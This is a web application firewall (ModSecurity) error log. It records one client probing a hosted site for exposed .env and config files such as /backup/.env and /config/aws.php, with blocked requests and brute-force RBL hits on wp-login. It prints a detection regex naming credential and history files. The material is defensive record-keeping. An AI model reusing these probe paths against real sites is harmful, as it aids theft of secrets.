[Tue May 26 14:49:58.528184 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:17136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyIwAAAIw"]
[Tue May 26 14:49:58.618512 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:17094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backup/.env"] [unique_id "ahVlvrEQDDtxJNiDrdTyKQAAAPA"]
[Tue May 26 14:49:58.632073 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:17018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyJAAAAJA"]
[Tue May 26 14:49:58.678745 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:17136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/beta/.env"] [unique_id "ahVlvrEQDDtxJNiDrdTyLQAAAKg"]
[Tue May 26 14:49:58.813919 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:17040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back-api/.env"] [unique_id "ahVlvrEQDDtxJNiDrdTyOQAAAMI"]
[Tue May 26 14:49:58.827511 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyMwAAALs"]
[Tue May 26 14:49:58.860226 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyNwAAALo"]
[Tue May 26 14:49:59.019810 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:17128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back-end/.env"] [unique_id "ahVlv7EQDDtxJNiDrdTySAAAAO0"]
[Tue May 26 14:49:59.029127 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyRAAAAK0"]
[Tue May 26 14:49:59.052911 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyRwAAAPw"]
[Tue May 26 14:49:59.121183 2026] [security2:error] [pid 648203:tid 648345] [client 46.203.157.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTySwAAAJE"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1280661&moderation-hash=635f273bee50743c651750021935dde8
[Tue May 26 14:49:59.131368 2026] [security2:error] [pid 648203:tid 648325] [remote 91.227.122.219:48526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyQQAAtHk"]
[Tue May 26 14:49:59.164767 2026] [security2:error] [pid 648203:tid 648361] [client 181.116.179.121:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyMAAAAKE"]
[Tue May 26 14:49:59.188824 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyTgAAANE"]
[Tue May 26 14:49:59.206757 2026] [security2:error] [pid 648203:tid 648385] [client 45.3.50.93:24881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyGAAAALk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:59.331704 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:17154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/client/.env"] [unique_id "ahVlv7EQDDtxJNiDrdTyVAAAALE"]
[Tue May 26 14:49:59.401894 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:17040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyVQAAAL4"]
[Tue May 26 14:49:59.411078 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:16988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyVgAAALc"]
[Tue May 26 14:49:59.451386 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:17020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyWAAAALg"]
[Tue May 26 14:49:59.482465 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:17036] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyWgAAAOk"]
[Tue May 26 14:49:59.490237 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyWwAAAKQ"]
[Tue May 26 14:49:59.592227 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:16988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/be/.env"] [unique_id "ahVlv7EQDDtxJNiDrdTyXgAAAN4"]
[Tue May 26 14:49:59.676805 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyYgAAAOw"]
[Tue May 26 14:49:59.707285 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyZQAAAKs"]
[Tue May 26 14:49:59.784898 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:17136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyaQAAAPk"]
[Tue May 26 14:49:59.802398 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:16988] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyagAAAPs"]
[Tue May 26 14:49:59.937354 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTycAAAAL0"]
[Tue May 26 14:50:00.021662 2026] [security2:error] [pid 648203:tid 648349] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTyXwAAAJU"]
[Tue May 26 14:50:00.023075 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTydgAAAMk"]
[Tue May 26 14:50:00.026994 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlv7EQDDtxJNiDrdTydQAAAPQ"]
[Tue May 26 14:50:00.085700 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:16970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/.env"] [unique_id "ahVlwLEQDDtxJNiDrdTygQAAAMY"]
[Tue May 26 14:50:00.127879 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyfAAAAI0"]
[Tue May 26 14:50:00.139545 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyfwAAAMg"]
[Tue May 26 14:50:00.147113 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTygwAAAKM"]
[Tue May 26 14:50:00.186417 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:17142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyhAAAAIs"]
[Tue May 26 14:50:00.200177 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/cms/.env"] [unique_id "ahVlwLEQDDtxJNiDrdTyiwAAAKo"]
[Tue May 26 14:50:00.230235 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:17040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyigAAALY"]
[Tue May 26 14:50:00.231203 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyiQAAANE"]
[Tue May 26 14:50:00.377335 2026] [security2:error] [pid 648203:tid 648425] [client 45.148.10.95:17040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config.php"] [unique_id "ahVlwLEQDDtxJNiDrdTynQAAAOE"]
[Tue May 26 14:50:00.378411 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTykwAAAK4"]
[Tue May 26 14:50:00.382561 2026] [security2:error] [pid 648203:tid 648459] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTylQAAAQM"]
[Tue May 26 14:50:00.392155 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:31686] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTylwAAAL4"]
[Tue May 26 14:50:00.394497 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTymQAAANA"]
[Tue May 26 14:50:00.401822 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTynAAAAMw"]
[Tue May 26 14:50:00.429277 2026] [security2:error] [pid 648203:tid 648443] [client 176.65.139.232:35102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "huronwoodphysio.com"] [uri "/.env"] [unique_id "ahVlwLEQDDtxJNiDrdTyogAAAPM"]
[Tue May 26 14:50:00.439440 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:31724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/config.inc.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyowAAAOo"]
[Tue May 26 14:50:00.439884 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:17154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyngAAAQA"]
[Tue May 26 14:50:00.524125 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:31668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/aws.php"] [unique_id "ahVlwLEQDDtxJNiDrdTypQAAAOM"]
[Tue May 26 14:50:00.575486 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:17128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/env.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyqAAAAOw"]
[Tue May 26 14:50:00.591584 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:31660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTypgAAAI8"]
[Tue May 26 14:50:00.591903 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:31736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTypAAAAN4"]
[Tue May 26 14:50:00.651190 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyqwAAALI"]
[Tue May 26 14:50:00.718895 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyrgAAAOU"]
[Tue May 26 14:50:00.720734 2026] [security2:error] [pid 648203:tid 648379] [client 45.148.10.95:31716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/nexmo.php"] [unique_id "ahVlwLEQDDtxJNiDrdTysAAAALM"]
[Tue May 26 14:50:00.750184 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:31704] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyrwAAALs"]
[Tue May 26 14:50:00.800678 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:31732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/config.php"] [unique_id "ahVlwLEQDDtxJNiDrdTytQAAAMM"]
[Tue May 26 14:50:00.862786 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTytAAAAMk"]
[Tue May 26 14:50:00.884326 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyuwAAAPA"]
[Tue May 26 14:50:00.885713 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:31648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyvQAAANQ"]
[Tue May 26 14:50:00.887009 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyvAAAAQE"]
[Tue May 26 14:50:00.887343 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:31680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTytgAAAO8"]
